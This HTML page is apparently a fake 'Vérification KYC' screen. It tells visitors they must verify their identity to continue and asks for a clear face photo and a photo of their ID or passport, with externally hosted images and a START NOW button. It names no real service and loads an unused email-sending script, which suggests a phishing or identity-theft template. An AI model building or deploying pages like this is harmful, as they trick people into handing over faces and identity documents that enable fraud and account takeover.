
<!DOCTYPE html>
<html lang ="en">
<head>
<meta charset="UTF-8"> 
  <meta http-equiv="X-UA-Compatible" content="IE=edge"> 
  <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js"></script> 
  <script src="https://smtpjs.com/v3/smtp.js"></script> 
  <script src="https://kit.fontawesome.com/7e2a69d5dd.js" crossorigin="anonymous"></script>
<script src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
</head>
<style>
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600&display=swap");
@import url('https://fonts.googleapis.com/css2?family=Archivo+Black&display=swap');

*{
    margin:0;
    padding:0;
}
body{
    font-family: "Poppins", sans-serif;
}
d{
    font-family: "Archivo Black", sans-serif;
    font-size:25px;
}
c{
    margin-left:3%;
    font-size:13px;
}
e{
    margin-left:3%;
    font-size:13px;
}
g{
    margin-left:15%;
    font-size:10px;
    font-family: "Archivo Black", sans-serif;
}
f{
  margin-left:15%;
    font-size:10px;
    font-family: "Archivo Black", sans-serif; 
}
.img img{
    width:350px;
}
.omg img{
    width:170px;
    padding:10%;
}
.emg img{
    width:150px;
}
.veri{
    margin-top:-53%;
    position:fixed;
}
.omg{
    margin-left:15%;
    text-align:center;
    border:1px solid #777;
    width:69%;
}
.emg{
    margin-left:15%;
    text-align:center;
    border:1px solid #777;
    width:69%;
}
button {
    margin-top:5%;
    margin-left:15%;
    border-radius:5px;
    padding:3.5%;
    background-color:rgb(255,193,7);
    color: black ;
    border:none;
    font-family: "Archivo Black", sans-serif;  
        width:70%;
    height:40px;
    
}
ob{
    margin-left:15%;
    font-size:15px;
    font-family: "Archivo Black", sans-serif; 
}
.tt{
    margin-left:15%;
    margin-right:15%;
}
</style>
<body>
<div class="img">
<img src="https://i.postimg.cc/L4f9DyMN/kyc-know-your-customer-businessman-600nw-2283323111.jpg">
</div>
<div class="veri">
<d>Vérification KYC</d>
</div>
<c>We must verify your identity before continuing this operation.</c><br>
<e>Send us the following information:</e><br>
<ob>Step 1</ob><br>
<g>A clearly visible photo of your face</g>

<div class="omg"><img src="https://i.postimg.cc/pL2s54qN/Wipe-Out26-02-2024-102631-048000-1.jpg"></div>

<ob>Step 2</ob><br>
<div class="tt"><f>A photo of your identity documents or passpo</f></div>
<div class="emg"><img src="https://i.postimg.cc/y8Y49jPQ/logo3-2-82453.jpg"></div>

<div class="btn">
<a href="#"><button type="button">START NOW</button></a></div><br>
</body>
</html>